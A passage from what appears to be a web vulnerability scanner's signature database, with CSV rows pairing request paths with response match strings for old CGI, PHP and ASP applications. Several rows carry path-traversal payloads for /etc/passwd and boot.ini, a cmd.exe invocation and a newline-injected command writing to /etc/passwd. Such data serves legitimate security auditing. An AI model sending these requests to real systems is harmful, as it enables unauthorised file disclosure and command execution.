scanner.\",\"\",\"\"\n\"002581\",\"3093\",\"1\",\"/rubrique.asp?no=....//....//....//....//....//....//....//etc.passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002582\",\"3093\",\"1\",\"/rubrique.asp?no=../../../../../../../../../etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002583\",\"3093\",\"1\",\"/rubrique.asp?no=/....../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002584\",\"3093\",\"1\",\"/rubrique.asp?no=/.../.../.../.../.../.../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002585\",\"3093\",\"1\",\"/rubrique.asp?no=/../../../../../../../../../../../../../../../../../../../../boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002586\",\"3093\",\"1\",\"/rubrique.asp?no=/../../../../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002587\",\"3093\",\"1\",\"/rubrique.asp?no=/../../../etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002588\",\"3093\",\"1\",\"/rubrique.asp?no=/.\\\"./.\\\"./.\\\"./.\\\"./.\\\"./boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002589\",\"3093\",\"1\",\"/rubrique.asp?no=/etc/passwd%00|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002590\",\"3093\",\"1\",\"/rubrique.asp?no=/etc/passwd|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;/&#039;.\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002591\",\"3093\",\"1\",\"/rubrique.asp?no=c:\\boot.ini|55|80040e14|[Microsoft][ODBC_SQL_Server_Driver][SQL_Server]Line_1:_Incorrect_syntax_near_&#039;c:&#039;.\",\"GET\",\"boot load\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002592\",\"3093\",\"1\",\"/screen.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002593\",\"3093\",\"1\",\"/scripts/tradecli.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002594\",\"3093\",\"1\",\"/scripts/tradecli.dll?template=nonexistfile?template=..\\..\\..\\..\\..\\winnt\\system32\\cmd.exe?/c+dir\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002595\",\"3093\",\"1\",\"/security/web_access.html\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002596\",\"3093\",\"1\",\"/sendphoto.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002597\",\"3093\",\"1\",\"/servers/link.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002598\",\"3093\",\"1\",\"/setpasswd.cgi\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002599\",\"3093\",\"1\",\"/shop/php_files/site.config.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002600\",\"3093\",\"1\",\"/shop/search.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002601\",\"3093\",\"1\",\"/shop/show.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002602\",\"3093\",\"1\",\"/shoutbox/expanded.php?conf=../../../../../../../etc/passwd%20\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002603\",\"3093\",\"1\",\"/Site/biztalkhttpreceive.dll\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002604\",\"3093\",\"1\",\"/site_searcher.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002605\",\"3093\",\"1\",\"/spelling.php3+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002606\",\"3093\",\"1\",\"/squirrelmail/src/read_body.php\",\"GET\",\"Project\\sTeam\",\"\",\"\",\"\",\"\",\"SquirrelMail found\",\"\",\"\"\n\"002607\",\"3093\",\"1\",\"/staticpages/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002608\",\"3093\",\"1\",\"/status.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002609\",\"3093\",\"1\",\"/supporter/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002610\",\"3093\",\"1\",\"/supporter/tupdate.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002611\",\"3093\",\"1\",\"/sw000.asp?|-|0|404_Object_Not_Found\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002612\",\"3093\",\"1\",\"/syslog.htm?%20\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002613\",\"3093\",\"1\",\"/technote/print.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002614\",\"3093\",\"1\",\"/texis/websearch/phine\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002615\",\"3093\",\"1\",\"/tinymsg.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002616\",\"3093\",\"1\",\"/tmp_view.php?file=/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002617\",\"3093\",\"1\",\"/topic/entete.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002618\",\"3093\",\"1\",\"/topsitesdir/edit.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002619\",\"3093\",\"1\",\"/ttforum/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002620\",\"3093\",\"1\",\"/tutos/file/file_new.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002621\",\"3093\",\"1\",\"/tutos/file/file_select.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002622\",\"3093\",\"1\",\"@TYPO3typo3/dev/translations.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002623\",\"3093\",\"1\",\"/uifc/MultFileUploadHandler.php+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002624\",\"3093\",\"1\",\"/url.jsp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002625\",\"3093\",\"1\",\"/useraction.php3\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002626\",\"3093\",\"1\",\"/userreg.cgi?cmd=insert&amp;lang=eng&amp;tnum=3&amp;fld1=test999%0acat&lt;/var/spool/mail/login&gt;&gt;/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002627\",\"3093\",\"1\",\"/utils/sprc.asp+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002628\",\"3093\",\"1\",\"/vars.inc+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002629\",\"3093\",\"1\",\"/VBZooM/add-subject.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002630\",\"3093\",\"1\",\"/wbboard/profile.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002631\",\"3093\",\"1\",\"/wbboard/reply.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002632\",\"3093\",\"1\",\"/webcalendar/login.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002633\",\"3093\",\"1\",\"/webcalendar/view_m.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002634\",\"3093\",\"1\",\"/webmail/lib/emailreader_execute_on_each_page.inc.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002635\",\"3093\",\"1\",\"/webmail/src/read_body.php\",\"GET\",\"Project\\sTeam\",\"\",\"\",\"\",\"\",\"SquirrelMail found\",\"\",\"\"\n\"002636\",\"3093\",\"1\",\"/web_app/WEB-INF/webapp.properties\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002637\",\"3093\",\"1\",\"/XMBforum/buddy.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002638\",\"3093\",\"1\",\"/XMBforum/member.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002639\",\"3093\",\"1\",\"/x_stat_admin.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002640\",\"3093\",\"1\",\"/yabbse/Reminder.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002641\",\"3093\",\"1\",\"/yabbse/Sources/Packages.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002642\",\"3093\",\"1\",\"/zentrack/index.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002643\",\"3093\",\"1\",\"/_head.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002644\",\"3093\",\"1\",\"@CGIDIRSadduser.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002645\",\"3093\",\"1\",\"@CGIDIRSamadmin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002646\",\"3093\",\"1\",\"@CGIDIRSanyboard.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002647\",\"3093\",\"1\",\"@CGIDIRSAT-generate.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002648\",\"3093\",\"1\",\"@CGIDIRSauctiondeluxe/auction.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002649\",\"3093\",\"1\",\"@CGIDIRSawl/auctionweaver.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002650\",\"3093\",\"1\",\"@CGIDIRSbb-ack.sh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002651\",\"3093\",\"1\",\"@CGIDIRSbb-histlog.sh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002652\",\"3093\",\"1\",\"@CGIDIRSbb-rep.sh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002653\",\"3093\",\"1\",\"@CGIDIRSbb-replog.sh\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002654\",\"3093\",\"1\",\"@CGIDIRSbbs_forum.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002655\",\"3093\",\"1\",\"@CGIDIRSbuild.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002656\",\"3093\",\"1\",\"@CGIDIRSbulk/bulk.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002657\",\"3093\",\"1\",\"@CGIDIRScached_feed.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002658\",\"3093\",\"1\",\"@CGIDIRScalender_admin.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002659\",\"3093\",\"1\",\"@CGIDIRScartmanager.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002660\",\"3093\",\"1\",\"@CGIDIRScbmc/forums.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002661\",\"3093\",\"1\",\"@CGIDIRScgforum.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002662\",\"3093\",\"1\",\"@CGIDIRSchange-your-password.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002663\",\"3093\",\"1\",\"@CGIDIRSclickresponder.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002664\",\"3093\",\"1\",\"@CGIDIRScommandit.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002665\",\"3093\",\"1\",\"@CGIDIRScounter-ord\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002666\",\"3093\",\"1\",\"@CGIDIRScounterbanner\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002667\",\"3093\",\"1\",\"@CGIDIRScounterbanner-ord\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002668\",\"3093\",\"1\",\"@CGIDIRScounterfiglet-ord\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002669\",\"3093\",\"1\",\"@CGIDIRScounterfiglet/nc/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002670\",\"3093\",\"1\",\"@CGIDIRSCSMailto.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002671\",\"3093\",\"1\",\"@CGIDIRSCSMailto/CSMailto.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002672\",\"3093\",\"1\",\"@CGIDIRScsNews.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002673\",\"3093\",\"1\",\"@CGIDIRScsPassword.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002674\",\"3093\",\"1\",\"@CGIDIRScsPassword/csPassword.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002675\",\"3093\",\"1\",\"@CGIDIRScutecast/members/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002676\",\"3093\",\"1\",\"@CGIDIRSday5datanotifier.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002677\",\"3093\",\"1\",\"@CGIDIRSdb2www/library/document.d2w/show\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002678\",\"3093\",\"1\",\"@CGIDIRSdb_manager.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002679\",\"3093\",\"1\",\"@CGIDIRSDCFORMS98.CGI\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002680\",\"3093\",\"1\",\"@CGIDIRSdnewsweb\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002681\",\"3093\",\"1\",\"@CGIDIRSdonothing\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002682\",\"3093\",\"1\",\"@CGIDIRSezshopper2/loadpage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002683\",\"3093\",\"1\",\"@CGIDIRSezshopper3/loadpage.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002684\",\"3093\",\"1\",\"@CGIDIRSif/admin/nph-build.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002685\",\"3093\",\"1\",\"@CGIDIRSikonboard/help.cgi?\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002686\",\"3093\",\"1\",\"@CGIDIRSimageFolio.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002687\",\"3093\",\"1\",\"@CGIDIRSimagefolio/admin/admin.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002688\",\"3093\",\"1\",\"@CGIDIRSjournal.cgi?folder=journal.cgi%00\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002689\",\"3093\",\"1\",\"@CGIDIRSmagiccard.cgi?pa=3Dpreview&amp;next=3Dcustom&amp;page=3D../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002690\",\"3093\",\"1\",\"@CGIDIRSmajordomo.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002691\",\"3093\",\"1\",\"@CGIDIRSmojo/mojo.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002692\",\"3093\",\"1\",\"@CGIDIRSncommerce3/ExecMacro/macro.d2w/%0a%0a\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002693\",\"3093\",\"1\",\"@CGIDIRSncommerce3/ExecMacro/macro.d2w/NOEXISTINGHTMLBLOCK\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002694\",\"3093\",\"1\",\"@CGIDIRSnon-existent.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002695\",\"3093\",\"1\",\"@CGIDIRSnph-exploitscanget.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002696\",\"3093\",\"1\",\"@CGIDIRSnph-maillist.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002697\",\"3093\",\"1\",\"@CGIDIRSparse-file\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002698\",\"3093\",\"1\",\"@CGIDIRSphp-cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002699\",\"3093\",\"1\",\"@CGIDIRSpollssi.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002700\",\"3093\",\"1\",\"@CGIDIRSpostcards.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002701\",\"3093\",\"1\",\"@CGIDIRSprofile.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002702\",\"3093\",\"1\",\"@CGIDIRSquikstore.cfg\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002703\",\"3093\",\"1\",\"@CGIDIRSregister.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002704\",\"3093\",\"1\",\"@CGIDIRSreplicator/webpage.cgi/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002705\",\"3093\",\"1\",\"@CGIDIRSrightfax/fuwww.dll/?\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002706\",\"3093\",\"1\",\"@CGIDIRSrmp_query\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002707\",\"3093\",\"1\",\"@CGIDIRSrobpoll.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002708\",\"3093\",\"1\",\"@CGIDIRSscripts/*%0a.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002709\",\"3093\",\"1\",\"@CGIDIRSsimplestguest.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002710\",\"3093\",\"1\",\"@CGIDIRSsimplestmail.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002711\",\"3093\",\"1\",\"@CGIDIRSstatusconfig.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002712\",\"3093\",\"1\",\"@CGIDIRSsws/manager.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002713\",\"3093\",\"1\",\"@CGIDIRStexis/phine\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002714\",\"3093\",\"1\",\"@CGIDIRSUpload.pl\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002715\",\"3093\",\"1\",\"@CGIDIRSutm/admin\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002716\",\"3093\",\"1\",\"@CGIDIRSutm/utm_stat\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  has been seen in web logs from an unknown scanner.\",\"\",\"\"\n\"002717\",\"3093\",\"1\",\"/ows-bin/oaskill.exe?abcde.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This might be interesting:  